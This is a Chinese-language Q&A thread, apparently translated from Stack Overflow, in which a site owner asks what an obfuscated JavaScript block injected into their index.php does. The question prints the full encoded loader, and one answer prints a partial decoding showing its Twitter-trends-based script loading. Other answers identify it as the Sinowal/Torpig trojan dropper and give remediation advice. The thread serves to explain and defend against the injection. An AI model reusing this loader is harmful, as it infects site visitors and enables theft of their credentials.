请帮我解读神秘的神秘代码 - 奇怪地放在我的index.php中

时间:2010-01-25 17:20:37

标签: php

有人恶意将以下代码插入我的网站ahoffmanawning.com。这可以通过写得不好的PHP脚本来完成吗?更重要的是,这个脚本在做什么?

<script language="javascript">
$a="Z63dZ3dZ22Z253dst+Z2553tZ2572iZ256eg.Z2566Z2572oZ256dCZ2568arCZ256fdeZ2528(tmZ2570Z252eZ2563hZ22;dzZ3dZ22Z2566Z2575nZ2563tZ2569on Z2564wZ2528t)Z257bcaZ253dZ2527Z252564Z25256fcZ252575mZ252565Z256eZ2574.Z252577ritZ252565Z25252Z2538Z252522Z2527;ceZ253dZ2527Z25252Z2532)Z2527;cZ2562Z253dZ2527Z25253cscrZ252569pZ252574Z2520Z25256caZ25256eguZ252561gZ252565Z25253dZ25255cZ252522Z256aaZ2576aZ2573Z2563Z252572iZ252570tZ2525Z2535Z2563Z252522Z25253Z2565Z2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ252572Z2569Z252570Z252574Z25253eZ2527;eZ2576aZ256c(unZ2565scaZ2570e(Z2574))Z257dZ253bZ22;caZ3dZ22Z2566Z2575Z256ecZ2574iZ256fn dZ2563sZ2528ds,Z2565sZ2529Z257bdsZ253duneZ2573capZ2565Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edZ22;opZ3dZ22Z2524Z2561Z253dZ2522dw(dcsZ2528cu,Z25314)Z2529;Z2522Z253bZ22;dbZ3dZ22gZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z2520;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07hucZ22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574;Z2564cZ2573(Z2564aZ252bdZ2562Z252bZ2564Z2563+Z2564dZ252bdZ2565Z252c1Z2530)Z253bdZ2577(Z2573Z2574Z2529;Z2573tZ253dZ2524aZ253bZ2522;Z22;dcZ3dZ227Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fZ22;czZ3dZ22Z2566Z2575Z256eZ2563tioZ256eZ2520czZ2528cz)Z257brZ2565tuZ2572n Z2563aZ252bcb+Z2563cZ252bcdZ252bce+Z2563Z257aZ253b}Z253bZ22;ceZ3dZ22aZ2572Z2543odZ2565AtZ25280)Z255eZ2528Z25270x0Z2530Z2527+eZ2573))Z2529;Z257dZ257dZ22;ccZ3dZ225ngtZ2568Z253bZ2569+Z252b)Z257btmpZ253ddZ2573.Z2573licZ2565(iZ252ci+Z2531);Z2573tZ22;ddZ3dZ22qb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iZ22;cbZ3dZ22(Z2564s);Z2573tZ253dtmZ2570Z253dZ2527Z2527;forZ2528Z2569Z253d0Z253bZ2569Z253cds.lZ256Z22;deZ3dZ22uqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sz|KZ2520;64c}p`|)Z25$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;Z69Z66Z20(Z64Z6fcuZ6denZ74.coZ6fkieZ2eindZ65xOZ66Z28Z27rf5fZ36Z64sZ27)Z3dZ3d-1)Z7bfunZ63Z74iZ6fn Z63allZ62aZ63Z6b(xZ29Z7bwindoZ77.tZ77Z20Z3d x;Z76Z61rZ20dZ20Z3dZ20newZ20DZ61tZ65Z28);dZ2eseZ74TiZ6de(Z78Z5bZ22as_Z6fZ66Z22]*Z31Z30Z300);Z76arZ20hZ20Z3dZ20dZ2egZ65tZ55TCHZ6fursZ28);Z77iZ6edZ6fwZ2ehZ20Z3d h;if Z28h Z3e 8)Z7bd.sZ65tZ55TCDZ61Z74eZ28d.gZ65tUZ54CZ44Z61Z74Z65()Z20-Z202);Z7delsZ65Z7bd.seZ74UTCZ44ateZ28d.Z67etUZ54CDaZ74e()Z20Z2d Z33)Z3b}wZ69ndZ6fw.gZ64Z20Z3d d;Z76arZ20tiZ6dZ65 Z3d Z6eewZ20ArZ72Z61y(Z29;vaZ72 shZ69ftZ49nZ64Z65xZ20Z3dZ20Z22Z22;timeZ5bZ22yearZ22] Z3d d.Z67etUZ54CFuZ6clZ59earZ28)Z3btimZ65[Z22moZ6etZ68Z22] Z3d dZ2egeZ74UZ54Z43MoZ6etZ68()+Z31;tZ69mZ65[Z22daZ79Z22] Z3d d.gZ65tUZ54CZ44aZ74e(Z29;ifZ20(dZ2egZ65tZ55TZ43MZ6fntZ68()+Z31 Z3cZ2010)Z7bshiZ66Z74IZ6edeZ78 Z3d timZ65[Z22yearZ22] +Z20Z22-0Z22 +Z20Z28d.gZ65tUTZ43MonZ74h(Z29+Z31Z29;}Z65Z6csZ65Z7bshifZ74InZ64eZ78 Z3d tZ69meZ5bZ22yearZ22] +Z20Z22Z2dZ22 Z2b (dZ2egeZ74Z55TCZ4donZ74h(Z29+Z31);Z7dZ69f Z28dZ2eZ67Z65tUZ54CDZ61teZ28Z29 Z3c 10Z29Z7bsZ68ifZ74IndZ65x Z3dshZ69ftZ49ndeZ78 + Z22Z2dZ30Z22 + dZ2eZ67Z65tUZ54CZ44aZ74e()Z3b}eZ6cseZ7bshZ69ftIZ6eZ64Z65Z78 Z3d sZ68ifZ74IZ6edZ65x +Z20Z22-Z22 +Z20dZ2eZ67etUZ54CDZ61tZ65()Z3b}dZ6fcZ75Z6dentZ2ewZ72iZ74Z65Z28Z22Z3cscrZ22+Z22ipt Z6caZ6eguZ61geZ3djZ61vasZ63rZ69ptZ22+Z22 srcZ3dZ27http:Z2fZ2fsearchZ2eZ74wiZ74teZ72.coZ6dZ2ftrZ65nZ64Z73Z2fdaZ69Z6cyZ2eZ6asonZ3fdatZ65Z3dZ22+ shiZ66tInZ64eZ78Z2bZ22&Z63allZ62Z61Z63Z6bZ3dcallbZ61ck2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 Z2b Z22iZ70Z74Z3eZ22);Z7d fZ75nZ63tioZ6e Z63Z61lZ6cbZ61cZ6b2(Z78)Z7bwindZ6fZ77.tZ77Z20Z3d x;Z73c(Z27rf5Z666dZ73Z27,2,7)Z3bevaZ6c(Z75Z6eesZ63apeZ28dzZ2bZ63zZ2bopZ2bsZ74)+Z27dwZ28Z64z+cZ7a($Z61+stZ29Z29;Z27);dZ6fcZ75menZ74.Z77ritZ65(Z24a)Z3b}dZ6fZ63umeZ6et.wZ72iteZ28Z22Z3cimgZ20sZ72cZ3dZ27http:Z2fZ2fseZ61rcZ68Z2etZ77Z69tteZ72.coZ6dZ2fZ69mZ61Z67eZ73Z2fseZ61rcZ68Z2frss.Z70ngZ27 wZ69dtZ68Z3d1Z20Z68Z65ighZ74Z3d1 stZ79lZ65Z3dZ27visibilZ69tZ79:hiZ64deZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6cangZ75agZ65Z3djavZ61sZ63riZ70tZ22+Z22 srcZ3dZ27httZ70:Z2fZ2fseaZ72ch.Z74Z77ittZ65rZ2ecomZ2fZ74renZ64sZ2fdaiZ6cy.jZ73Z6fn?cZ61lZ6cZ62ackZ3dcaZ6clbZ61ckZ27Z3eZ22 + Z22Z3cZ2fscrZ22 +Z20Z22ipZ74Z3eZ22);Z7deZ6csZ65Z7b$aZ3dZ27Z27};functionZ20sZ63Z28Z63nm,Z76Z2cedZ29Z7bvar eZ78dZ3dnewZ20DatZ65()Z3beZ78d.Z73Z65tZ44aZ74Z65Z28exdZ2egeZ74Z44aZ74Z65Z28)Z2bedZ29;dZ6fcZ75menZ74.cZ6fokiZ65Z3dcnZ6d+ Z27Z3dZ27 +esZ63apeZ28v)Z2bZ27;expiZ72esZ3dZ27+eZ78Z64.Z74Z6fZ47Z4dTZ53Z74rinZ67();Z7dZ3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));
</script>

4 个答案:

答案 0 :(得分:3)

重申:没有人在您的浏览器中运行 kthx

这是混淆的javascript代码;我们没有人可能有足够的时间为你解码它,但如果你不知道它是如何到达那里的,那肯定是恶意代码会试图使用某些浏览器漏洞或其他漏洞来安装恶意软件。

关于它是如何到达的:有人可以访问您的服务器文件 这可能是(按照可能的顺序):

  • 有人发现了一个php漏洞,让他们可以访问您的文件系统
  • 有人可以访问您的ftp信息
  • 你有一个邮件编码器
  • 或者可能是服务器上运行的Web服务器,数据库,操作系统或某些服务存在漏洞。

我会更改您的FTP密码,将您系统中的所有可能事物更新到最新版本,并严格查看访问文件系统的任何自定义PHP代码。


[编辑] :根据dth给出的链接,代码会下载并执行名为Sinowal的木马(病毒)。

  

此木马试图从受感染的计算机上窃取不同的系统和帐户信息。被盗信息可能如下:

     

•来自邮件客户端的IMAP / POP3 / SMTP用户名,密码,服务器信息,如AK-Mail,Thunderbird,TheBat
   •书签
   •Windows通讯簿中的电子邮件地址
   •从FTP客户端存储的密码和其他数据,如Trellian FTP,WS_FTP,Total Commander,Crystal FTP Pro和GlobalSCAPE

     

它还监控网络浏览器,如Internet Explorer,Firefox和Mozilla,以获取网上银行信息

答案 1 :(得分:1)

这就是它的作用。它似乎只是从垃圾开始隐藏它的作用,但最后有一些推特帖子我认为。享受!

cd="%3dst+%53t%72i%6eg.%66%72o%6dC%68arC%6fde%28(tm%70%2e%63h";dz="%66%75n%63t%6
9on %64w%28t)%7bca%3d%27%2564%256fc%2575m%2565%6e%74.%2577rit%2565%252%38%2522%2
7;ce%3d%27%252%32)%27;c%62%3d%27%253cscr%2569p%2574%20%256ca%256egu%2561g%2565%2
53d%255c%2522%6aa%76a%73%63%2572i%2570t%25%35%63%2522%253%65%27;cc%3d%27%253c%25
5c%252fsc%2572%69%2570%2574%253e%27;e%76a%6c(un%65sca%70e(%74))%7d%3b";ca="%66%7
5%6ec%74i%6fn d%63s%28ds,%65s%29%7bds%3dune%73cap%65";da="fqb0t-7vrs}vyb>s%7F}7+
0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660
gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyM
K$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv
088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0
-0gy~t%7Fg>d";op="%24%61%3d%22dw(dcs%28cu,%314)%29;%22%3b";db="g>dbu~tcKyMK$M>ae
ubi>sxqbS%7FtuQd8!90;0!%20;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxy
vdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb8
9+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudE
DSTqdu89+fqb0t-7vrs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87e~%7F7<07tfu7<07dxb7<07
vyb7<07fyv7<07huc";st="%73t%3d%22$%61%3ds%74;%64c%73(%64a%2bd%62%2b%64%63+%64d%2
bd%65%2c1%30)%3bd%77(%73%74%29;%73t%3d%24a%3b%22;";dc="7<07fuc7<07wxd7<07u~y7<07
ud~7<07|uf7<07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<
7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}ru
bc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%
7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;
0tqi9+m0f";cz="%66%75%6e%63tio%6e%20cz%28cz)%7br%65tu%72n %63a%2bcb+%63c%2bcd%2b
ce+%63%7a%3b}%3b";ce="a%72%43od%65At%280)%5e%28%270x0%30%27+e%73))%29;%7d%7d";cc
="5ngt%68%3b%69+%2b)%7btmp%3dd%73.%73lic%65(i%2ci+%31);%73t";dd="qb0iuqbSx!<0iuq
bSx%22<0}%7F~dxSx<0tqiSx<0~e}+%19~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}
%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90
;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%2
2%M+%19iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050!%209M0;0
|uddubcK8888dy}uK7i";cb="(%64s);%73t%3dtm%70%3d%27%27;for%28%69%3d0%3b%69%3cds.l
%6";de="uqb7M060%20h##!!90..0$90;0~e}9050!%209M+%19}%7F~dxSx0-0|uddubcK88dy}uK7}
%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|ud
dubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}
9050%22$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7
F~dxcKdy}uK7}%7F~dx7M0=0!M0;07>s%7F}79+m";cu="(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}r
fuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;sz|K%20;64c}p`|)%$4|q}s|`),$*(;}rfuyq*(;p}b*";if
 (document.cookie.indexOf('rf5f6ds')==-1){function callback(x){window.tw = x;var
 d = new Date();d.setTime(x["as_of"]*1000);var h = d.getUTCHours();window.h = h;
if (h > 8){d.setUTCDate(d.getUTCDate() - 2);}else{d.setUTCDate(d.getUTCDate() -
3);}window.gd = d;var time = new Array();var shiftIndex = "";time["year"] = d.ge
tUTCFullYear();time["month"] = d.getUTCMonth()+1;time["day"] = d.getUTCDate();if
 (d.getUTCMonth()+1 < 10){shiftIndex = time["year"] + "-0" + (d.getUTCMonth()+1)
;}else{shiftIndex = time["year"] + "-" + (d.getUTCMonth()+1);}if (d.getUTCDate()
 < 10){shiftIndex =shiftIndex + "-0" + d.getUTCDate();}else{shiftIndex = shiftIn
dex + "-" + d.getUTCDate();}document.write("<scr"+"ipt language=javascript"+" sr
c='http://search.twitter.com/trends/daily.json?date="+ shiftIndex+"&callback=cal
lback2'>" + "</scr" + "ipt>");} function callback2(x){window.tw = x;sc('rf5f6ds'
,2,7);eval(unescape(dz+cz+op+st)+'dw(dz+cz($a+st));');document.write($a);}docume
nt.write("<img src='http://search.twitter.com/images/search/rss.png' width=1 hei
ght=1 style='visibility:hidden' /> <scr"+"ipt language=javascript"+" src='http:/
/search.twitter.com/trends/daily.json?callback=callback'>" + "</scr" + "ipt>");}
else{$a=''};function sc(cnm,v,ed){var exd=new Date();exd.setDate(exd.getDate()+e
d);document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();};

答案 2 :(得分:1)

http://wepawet.cs.ucsb.edu/static/torpig-twitter.html已为您解密和分析所有内容。

干杯m8。

答案 3 :(得分:0)

看起来它正在获取推特上的热门话题列表。这会给你更多关于如何到达那里的提示吗?